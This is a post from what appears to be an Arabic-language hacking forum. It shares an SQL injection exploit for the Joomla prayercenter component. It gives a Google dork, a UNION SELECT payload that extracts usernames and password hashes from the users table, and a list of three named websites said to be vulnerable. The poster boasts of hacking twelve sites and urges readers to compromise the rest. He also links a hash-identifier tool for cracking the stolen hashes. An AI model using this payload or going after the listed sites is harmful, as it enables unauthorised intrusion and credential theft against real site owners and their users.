--------------------------------------------------------------------------------
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
كيفك عساكم طيبين اليوم ولله الحمد طفشت من الأختراق وقلت لازم اكتشف ثغرةSQL لأعضائنا وحبايبنا طيب هالثغرة اقل شئ مصاب فيها من مواقع يمكن 300 موقع اذا ما خاب ضني
انا مخترق 12 فقط والباقي ابيكم تجيبون راسها ..
تفضلوا هذي الثغرة
كود PHP:
/-------------------SARBOT511--------------------------------------------
/
/ Joomla Component prayercenter Remote SQL injection
/
---------------------------------------------------------------/
[*] Author : sarbot511-TnT SMART SECURTY CRW
[*] Dork : inurl:"com_prayercenter"
[*] POC :
http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id={SQL} [*] Example :
http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
[*] Note : Sometimes you need to register for doing this exploit
----------------------------------------------------------------------------[*] Greetings : DR.NeT,silvar_ss, all friends & muslims HaCkeRs...[*] Greetings2 :
http://www.3asfh.net/vb المواقع المصابة:
1-http://cmanz.org.nz
2-http://davisgroup.4growthgroups.org
3-http://www.firstaogw.org
طيب الي يواجهة مشكلة في فك الهاش هذا برنامج يحدد لك مقياس الهاش
اما MD5 , MD4 ML SQL BASE64
تفضلوا التحميل من هنا اضغط هنا
http://3sl-bh.net/Hash_Checker.rarموفقين بأذن الله